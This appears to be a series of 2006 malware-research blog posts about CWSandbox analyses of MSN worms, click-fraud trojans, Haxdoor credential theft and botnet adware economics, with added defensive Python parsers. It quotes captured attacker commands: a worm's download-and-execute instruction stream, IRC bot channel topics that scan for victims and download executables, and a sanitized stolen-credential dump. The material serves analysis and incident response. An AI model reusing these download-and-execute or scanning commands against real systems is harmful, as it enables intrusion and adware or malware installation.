CWSandbox vs. MSN Worms

Thursday, September 28. 2006
The very good F-Secure weblog recently had an entry entitled "MSN Worm Used to Download Adware Programs" (thanks common for pointing this out!). To download additional malware to the infected hosts, the worm uses a very simple transfer mechanism on TCP port 80:
$ nc XXX.64.38.YYY 80
down http://www.lollpics.net/[Removed] a.exe;shell a.exe;
down http://promo.dollarrevenue.com/webmasterexe/[Removed] drsmartload1135a.exe;
shell drsmartload1135a.exe;
down http://www.uglyphotos.net/[Removed] Yinstall.exe;
shell Yinstall.exe;
down http://www.lollpics.net/[Removed] mny.exe;
shell mny.exe;
shell a.exe;
shell a.exe;
shell a.exe;

So the infected host just contacts XXX.64.38.YYY on TCP port 80 and then receives instructions to download several files, which are executed in the next step. Currently, four additional pieces of malware are installed on the compromised machine, one of them again being Adware related to dollarrevenue.com. A full analysis report (detailed XML report) generated by CWSandbox is also available.
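As an added example (not from the F-Secure post or the CWSandbox report), a small Python parser for this down/shell instruction stream, the kind of thing an analyst runs over a captured session to pull out the download URLs and hosts to block and to see which files get executed. The sample stream and its hosts are constructed placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed sample of the instruction stream an infected host receives on TCP
# port 80 (same "down URL file;" / "shell file;" grammar as the capture above;
# the hosts are placeholders, not the real ones).
SAMPLE_STREAM = (
    "down http://www.example-a.invalid/dl/a.exe a.exe;shell a.exe;\n"
    "down http://promo.example-b.invalid/webmasterexe/drsmartload1135a.exe drsmartload1135a.exe;\n"
    "shell drsmartload1135a.exe;\n"
    "shell mny.exe;\n"          # executed although this stream never downloads it
    "shell a.exe;\n"
    "shell a.exe;\n"
)

CMD_RE = re.compile(r"^(?P<verb>down|shell)\s+(?P<args>.+)$")

def parse_instructions(stream):
    """Split the ';'-separated stream into tuples: ('down', url, file), ('shell', file)
    or ('unknown', raw) for anything outside the two-verb grammar."""
    actions = []
    for raw in stream.replace("\n", " ").split(";"):
        cmd = raw.strip()
        if not cmd:
            continue
        m = CMD_RE.match(cmd)
        args = m.group("args").split() if m else []
        if m and m.group("verb") == "down" and len(args) == 2:
            actions.append(("down", args[0], args[1]))
        elif m and m.group("verb") == "shell" and len(args) == 1:
            actions.append(("shell", args[0]))
        else:
            actions.append(("unknown", cmd))
    return actions

def summarize(actions):
    """Turn the action list into what a responder needs: URLs and hosts to block,
    the execution order, and files run without being fetched in this session."""
    downloads, executed = {}, []          # local file -> URL; files in run order
    for act in actions:
        if act[0] == "down":
            downloads[act[2]] = act[1]
        elif act[0] == "shell":
            executed.append(act[1])
    hosts = sorted({urlparse(u).hostname for u in downloads.values()})
    not_downloaded = sorted({f for f in executed if f not in downloads})
    return {"downloads": downloads, "hosts": hosts,
            "executed": executed, "not_downloaded": not_downloaded}
```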

And a link from a reader (thanks Jean-Philippe!): Trend Micro launches anti-botnet service. It seems there are now several companies that offer such services; let's see who is successful...

CWSandbox vs. Click-Fraud Trojans

Sunday, September 24. 2006
Business Week had an interesting story about click fraud recently (also at /.). This seems to be a really lucrative business and there is of course also malware that helps the attacker to automatically generate clicks on websites.
One example of such a piece of malware is Trojan.Clicker (named by F-Secure), which currently also dominates the monthly world map of malware infections. The operation mode of this Trojan is rather simple: after the initial infection (e.g., download via bots), it remains resident in memory and periodically opens certain web pages with the help of Internet Explorer, thus generating clicks on those web pages. Hence, the attacker automatically generates revenue from his compromised machines...
A more detailed analysis of a particular Trojan.Clicker variant is available as CWSandbox report.

Public Web Interface to CWSandbox

Wednesday, September 20. 2006
Greetings from Hack In The Box 2006! I'm happy to announce that we have finally a public web interface to CWSandbox: just go to http://www.cwsandbox.org and submit a binary. A couple of minutes later, you should find an analysis in your e-mail inbox.

William Salusky over at ISC wrote:

"Malware analysts rejoice! A public submission interface for the CWSandbox (NEW)

The public availability of a submission interface into the CWSandbox is finally at hand.

The CWSandbox has been a somewhat closely held tool in the professional security and AV researcher community for many months now. The CWSandbox results offer near immediate insight into the actions of malicious code execution on win32 based systems which in turn offers you, the affected party some quick intel on what might be happening on your network!

Please be kind and submit samples that you have vetted in some way as malicious. I'm sure this project would not be interested in receiving copies of your %SYSTEM% directory.

You can submit your malicious code samples via the sample web submission form at:
https://luigi.informatik.uni-mannheim.de/submit.php

CWSandbox results containing the sandbox/AV results are emailed to the submitter address.

This sandbox environment currently tracks malicious code variants against only three free/unnamed AV products at the moment. I'm confident that this project would be interested in hearing from commercial AV vendors willing to offer unix based solutions to further their detection effort.

Handler on duty
W"

Indeed, if AV vendors want to help us with some kind of AV engines, we are more than happy to hear from you :-) It is also possible to license CWSandbox if you want to use it at your site - for more information just contact thorsten [dot] holz [@] gmail [dot] com

On the Economics of Botnets - Part 2

Friday, September 15. 2006
Since the economic aspects of network attacks seem to be of interest to some people (eWEEK and /.), I blog more about it... But first, let me thank Jens Hektor and Jan Göbel, who analyzed the incident and provided me with further data - without them, I could not blog about this :-)

Recently there was a malware incident within the network of my old university in Aachen: Blast-o-Mat, a custom IDS system, picked up an infected machine and redirected it to a quarantine webserver. This way, the user is instantly notified that something went wrong and can download patches and AV engines at that web site. A closer examination revealed that the infected machine also made some strange web requests. It tried to post data to a PHP script located on a remote server. It turned out that this machine was infected with Haxdoor (F-Secure report), one of the most advanced Trojans out there nowadays. Haxdoor (AKA Goldun) is - among other things - capable of collecting private data like username/password combinations entered within Internet Explorer and also has some rootkit capabilities.

During further investigation, several log files containing all the information stolen from all infected machines could be found. In total, these log files contained more than 6.6 million entries, an equivalent of 285 MB of data. This data was stolen from the compromised machines between April 19 and April 27, 2006, so within only nine days. In total, more than 39,000 different IP addresses fell victim to this particular Haxdoor infection. This shows the effectiveness of this kind of attack.

The vast majority of victims were located in Germany, most of them within IP ranges of dial-up users. This user group is an easy, yet very attractive, target for attackers: people who use the Internet at home for entertainment purposes are often not very security aware. Furthermore, patch management or additional security software like anti-virus engines or host-based firewalls are unfamiliar terms for them. Thus an attacker can compromise these unpatched machines with the help of autonomously spreading software in the form of bots. Once he has complete control over the victim’s machine, he can use it to install additional tools, for example keyloggers or even more advanced tools like Haxdoor.

Presumably the most severe form of identity theft caused by Haxdoor concerns information related to financial transactions. This Trojan monitors the use of Internet Explorer and sends captured data (e.g., URLs and the content of HTML forms) to a central logging server, so this very sensitive information ends up with the attacker. In the log files we found traces of at least 15 different banks whose customers were affected. Moreover, the log files contain complete information about at least 280 bank accounts and complete details of 28 credit card numbers. The rather low number of credit card details can be explained by the nationality of the victims: in Germany, the use of credit cards is not as common as in the US.

In addition, Haxdoor is capable of retrieving the information in the Protected Storage (PStore) Service of infected machines, which contains rather sensitive information, as the following (sanitized) example shows:

-==; Protected Storage: 
Outlook: pop.gmx.net | PASS
http://12090.forum.onetwomax.de/:StringData | USER PASS
http://ksv-hessen.de/:StringData | USER PASS
http://pixum.de/:StringData | e-Mail PASS
http://www.fussballstammtisch.de:StringData | USER PASS
http://www.willstequatschen.com/index.php:StringData | USER PASS
-==; Account
POP3 Server | pop.gmx.net
POP3 User Name | e-Mail


This information was handed over to the fine guys at DFN-CERT, the Computer Emergency Response Team responsible for German research and education networks. The affected users were warned in cooperation with universities, ISPs and other affected sites - at least as well as possible...
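As an added example (not DFN-CERT's or the authors' tooling), a Python parser for the dump format shown above that extracts, per victim, the hostnames for which credentials were stolen and aggregates them across victims, which is the first step in working out which sites and banks to notify. The two victim dumps and the watchlist domain are constructed, and each victim's dump is assumed to arrive as its own text block.

```python
import re
from collections import Counter
from urllib.parse import urlparse
# Two constructed, sanitized victim dumps in the format shown above; each
# victim's dump is assumed to arrive as its own text block.
VICTIM_DUMPS = [
    "-==; Protected Storage: \n"
    "Outlook: pop.mail.example | PASS\n"
    "http://forum.example.net/:StringData | USER PASS\n"
    "http://online.bank.example/login:StringData | USER PASS\n"
    "-==; Account\n"
    "POP3 Server | pop.mail.example\n",
    "-==; Protected Storage: \n"
    "http://www.forum.example.net:StringData | USER PASS\n"
    "https://online.bank.example/:StringData | USER PASS\n",
]
SECTION_RE = re.compile(r"^-==;\s*(?P<name>[^:]+?)\s*:?\s*$")

def parse_dump(text):
    """Return {section name: [(key, value), ...]} for one victim's dump."""
    sections, current = {}, None
    for line in text.splitlines():
        m = SECTION_RE.match(line.rstrip())
        if m:
            current = m.group("name")
            sections.setdefault(current, [])
        elif current is not None and "|" in line:
            key, value = (p.strip() for p in line.split("|", 1))
            sections[current].append((key, value))
    return sections

def affected_hosts(sections):
    """Hostnames whose credentials sit in the Protected Storage section."""
    hosts = set()
    for key, _ in sections.get("Protected Storage", []):
        if key.startswith("http"):   # "http://host/path:StringData" -> host
            host = urlparse(key.rsplit(":StringData", 1)[0]).hostname
            if host:
                hosts.add(host.lower())
        elif key.startswith("Outlook:"):   # mail server of the stolen POP3 password
            hosts.add(key.split(":", 1)[1].strip().lower())
    return hosts

def triage(dumps, watchlist=()):
    """Count victims per exposed host; flag hosts under watchlist domains (the banks to notify)."""
    per_host = Counter()
    for dump in dumps:
        per_host.update(affected_hosts(parse_dump(dump)))
    hits = {h: n for h, n in per_host.items() if any(h == d or h.endswith("." + d) for d in watchlist)}
    return per_host, hits
```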

On the Economics of Botnets

Friday, September 8. 2006
Running a botnet can be a lucrative way for an attacker to make some money. He can, for example, rent his bots to a spammer who then uses the SOCKS proxy on the compromised machines to send out tons of spam. Or he can install keyloggers or tools that read out the Protected Storage in order to retrieve sensitive information from the victims. Or he can install Adware on those machines and earn some money that way.

Adware seems to be rather lucrative: recently we were monitoring several botnets that use the MS06-040 vulnerability (Vulnerability in Server Service Could Allow Remote Code Execution; PoC). One of those botnets used the following channel structure:
  • #f00#: .ircraw join #scan#,,#frame##Do#,#a#
  • #scan#: .scan netapi 100 3 0 -r -b -s
  • #frame#: .download http://XXXsikpgz.com/dl/loadadv518.exe c:\lsas.exe 1 -s
  • #Do#: .download http://promo.dollarrevenue.com/webmasterexe/drsmartloadXXXa.exe c:\do.exe 1 -s
  • #a#: .download http://YYY.19.23.XXX/~from/taskmgr.exe c:\taskmgr.exe 1 -s

The main channel #f00# is just used to dispatch all incoming bots. The bots join four different channels:
  1. #scan# is used to propagate further: all bots scan for other victims.
  2. Adware is installed on all compromised machines via the topic of channel #frame#.
  3. Another piece of Adware is installed in channel #Do# - in this case a binary from http://www.dollarrevenue.com/
  4. Finally, the channel #a# installs an additional binary on all bots.


OK, and how much can a botherder earn with this kind of attack? Taking a quick look at the numbers reveals the following: DollarRevenue pays per install, depending on the country the bot is installed in. Within 24 hours, this botnet compromised a little over 7700 machines. Doing some quick math leads to the following result:
$ grep US 2006-08-28.log | wc -l 
998
$ grep CAN 2006-08-28.log | wc -l
20
$ grep GBR 2006-08-28.log | wc -l
103
$ grep CHN 2006-08-28.log | wc -l
756
$ egrep -v "US|CAN|GBR|CHN" 2006-08-28.log | wc -l
5852

998 x $0.3 + 20 x $0.2 + 103 x $0.1 + 756 x $0.01 + 5852 x $0.02 = $438.30

So he earns more than $430 on a single day just with DollarRevenue, presumably a similar sum with the other pieces of Adware. Not a bad income for doing almost no work ;-)
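The quick math above, as an added Python example (not the author's script), generalized to a per-country install counter over an install log: the rates are the ones quoted in the post, the log lines and their format are constructed, and repeated reports from the same bot IP are counted once, since a bot that reconnects is not a second install.

```python
from collections import defaultdict
from decimal import Decimal

# Per-install rates quoted in the post (USD); any other country gets OTHER_RATE.
RATES = {"US": Decimal("0.30"), "CAN": Decimal("0.20"),
         "GBR": Decimal("0.10"), "CHN": Decimal("0.01")}
OTHER_RATE = Decimal("0.02")

# Constructed install log, one "<date> <time> <bot ip> <country>" line per report.
# The third line is the same US bot reporting again, i.e. not a second install.
SAMPLE_LOG = """\
2006-08-28 00:01:07 192.0.2.10 US
2006-08-28 00:01:09 198.51.100.7 CHN
2006-08-28 00:03:41 192.0.2.10 US
2006-08-28 00:04:02 203.0.113.5 DEU
malformed entry
2006-08-28 00:05:15 203.0.113.9 GBR
"""

def count_installs(log_text, dedupe=True):
    """Installs per country code. With dedupe, each (ip, country) pair is counted
    once, so reconnecting bots do not inflate the figure the way plain grep does."""
    seen, counts = set(), defaultdict(int)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue                         # skip malformed lines
        ip, country = parts[2], parts[3]
        if dedupe:
            if (ip, country) in seen:
                continue
            seen.add((ip, country))
        counts[country] += 1
    return dict(counts)

def payout(counts):
    """Total payout for a {country: installs} map at the per-install rates above."""
    return sum((n * RATES.get(c, OTHER_RATE) for c, n in counts.items()), Decimal("0"))
```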